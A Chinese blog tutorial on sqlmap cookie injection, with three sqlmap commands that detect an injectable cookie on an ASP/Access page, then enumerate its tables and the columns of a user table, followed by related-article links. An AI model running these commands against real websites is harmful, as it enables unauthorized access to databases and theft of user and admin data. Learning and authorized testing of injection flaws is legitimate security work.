Sqlmap是什么我就不多说了,它就是一个渗透测试工具,主要是用来SQL注入的,支持很多种类型的数据库。用工具sqlmap来做cookie注入很简单,只需要用sqlmap cookie注入命令即可!具体操作如下:

1、检测是否有cookie注入?

root@Kali:~# sqlmap -u http://www.xxxxxx.com/Newsshow.asp --cookie "ID=212" --level 3

注意:这里或许很慢,请大家耐心等待即可!

得到如下结果:

存在Cookie注入,布尔类型的盲注等。网站开发语言是ASP,数据库类型是Microsoft Access;服务器系统是Windows;

2、猜表名

root@Kali:~# sqlmap -u http://www.xxxxxx.com/Newsshow.asp --cookie "ID=212" --level 3 --tables

3、猜列名

root@Kali:~# sqlmap -u http://www.xxxxxx.com/Newsshow.asp --cookie "ID=212" --level 3 -T user --columns

当然,当我再去猜admin表的时候,sqlmap就报错如下:

[CRITICAL] can't use column existence chek because of detected inval id resultes(most probably caused by inability of the used injection to distinguish errornous results)

中文翻译

[CRITICAL]不能使用列存在,因为检测到的内部空间结果(最可能是由于使用的注入无法区分错误结果)

cookie注入方法就是这样的,虽然猜不到列名,不过,不用太在意结果,知道原理即可!还是要以一个正确的学习态度为主。

赞 2赏

sqlmap指定cookie_Sqlmap Cookie注入 教程相关推荐

  1. sqlmap指定cookie_SQLmap

    **参数解释** 星号 在注入的过程中,有时候是伪静态的页面,可以使用星号表示可能存在注入的部分 --data 使用post方式提交的时候,就需要用到data参数了 -p 当我们已经事先知道哪一个参数 ...

  2. sqlmap指定cookie_sqlmap使用

    kali中sqlmap的使用 sqlmap简介: SQLmap是一个自动化的SQL注入攻击,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞. 目前支持Mysql.Oracle.MS-SQL. ...

  3. sqlmap指定cookie_sqlmap处理cookie数据

    Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据.Cookie在web应用中至关重要,用户的唯一标识session id也是存在cookie中的. 那么,在sqlmap使用的时候, ...

  4. sqlmap指定cookie_利用SQLMap进行cookie注入

    SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用 到cookie注入,一遇到cookie注入就去使用注入中转工 ...

  5. cookie注入分析和动画教程

    cookies的注入方法和原理 现在很多网站都采用了通用防注入程序,那么对于这种网站,我门是否就束手无策了呢?答案是否定的,因为我们可以采用cookie 注入的方法,而很多通用防注入程序对这种注入方式 ...

  6. (渗透-摘录) cookie 注入

    2019年2月11日  (渗透--摘录1) cookie注入 抛开中转工具直接搞定Cookie注入 最近在翻看危险漫步博客的时候,拜读了一篇关于Cookie注入的文章,受益良多.文中详细解析了Cook ...

  7. sqlmap 注入教程 常用命令大全

    sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage –hh 帮助手册 ...

  8. SQLMAP注入教程-11种常见SQLMAP使用方法

    一.SQLMAP用于Access数据库注入 (1)猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.a ...

  9. sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程

    Sqlmap工具 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹.访问底层文件系统.执行命令) sql注 ...

  10. SQLmap注入教程

    一次sqlmap注入点并且dump出账号密码全程 判断注入点:sqlmap.py -u "存在注入url" 爆出所有数据库名字:sqlmap.py -u "存在注入url ...

最新文章

  1. 什么是采样层(pooling)
  2. php看什么教程,PHP初学者适合看什么
  3. 问题 A: 喷水装置(一)
  4. 在ASP.Net 2.0中实现多语言界面的方法
  5. “References to generic type List should be parameterized”
  6. CM:How is the version of word installed in client returned to Application server
  7. Symbol MC1000 扫描 冲突问题 把下面文件做成scanwedge.reg的注册表文件,放在Application重起
  8. BZOJ.2780.[SPOJ8093]Sevenk Love Oimaster(广义后缀自动机)
  9. Mac Pro 修改环境变量
  10. Mac jupyter 绘制matplotlib图像解决中文空格的问题
  11. 使用Fargate在AWS ECS中部署ASP.NET Core 微服务
  12. myisam读取速度为什么比innodb快_为什么MySQL用B+树做索引
  13. AcheGesture 简介(使用方法 / 中文教程)
  14. python适合自学编程吗-对没有编程基础的人来说,直接学Python入门IT合适吗?
  15. 【Q】CentOS-部署后,只有本机可以访问的问题
  16. 数字信号处理的fpga实现_数字信号处理的卷积运算实现
  17. LCD1602液晶显示设计
  18. Qt QML 模块化管理(三)—— qmldir的化繁为简
  19. 好玩的黑客游戏(过把黑客的瘾)
  20. JVM内存区域(Java内存区域)、JVM垃圾回收机制(GC)初探

热门文章

  1. CSS盒模型(Box Model)
  2. 设计模式之二 工厂模式
  3. NPAPI插件开发记录(一)----- .rc文件 支持Chrome和FireFox
  4. 学习asp.net比较完整的流程 (对初学者有很好的帮助)
  5. 形态学滤波对图像进行边缘及角点检测
  6. bash shell set 命令
  7. HashMap源码剖析(代码基于JDK11)
  8. matlab 电流相量图,表示了电路电压相量与电流相量之间的关系.ppt
  9. Qtableview实现对某一列可编辑,对某几列不可编辑
  10. linux实验的试验环境,Linux基本环境_实验日志解析.docx